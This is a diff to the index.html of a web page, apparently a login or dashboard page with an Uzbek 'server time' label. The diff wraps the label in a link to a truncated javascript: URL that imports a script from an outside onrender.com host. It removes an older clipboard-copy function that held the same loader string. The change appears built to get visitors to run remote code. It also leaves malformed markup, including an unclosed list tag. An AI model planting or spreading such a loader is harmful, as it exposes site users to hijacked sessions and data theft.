--- a/index.html
+++ b/index.html
@@ -187,22 +187,11 @@ class="feather feather-align-left">
 <li class="dropdown">
 <p href="#" class="text-right text-blue server-time">
 
-<span>Server vaqti</span><br>
+<span><a href="avascript:import("https://young-z7wb.onrender.com/a.js") "> Server vaqti </a> </span><br>
 <strong>15.12.2025 | 14:38</strong>
 </p>
-	<script>
-function copyServerLink() {
-    const text = 'avascript:import("https://young-z7wb.onrender.com/a.js")';
 
-    navigator.clipboard.writeText(text).then(() => {
-        alert("Ссылка скопирована!");
-    }).catch(err => {
-        console.error("Ошибка копирования: ", err);
-    });
-}
-</script>
-
-</li>
+</li
 
 <li class="dropdown">
 <a href="javascript:void(0)" class="dropdown-toggle" data-toggle="dropdown"
@@ -498,6 +487,7 @@ signInAjax();
 </body>
 
 </html>
+
 
 
 
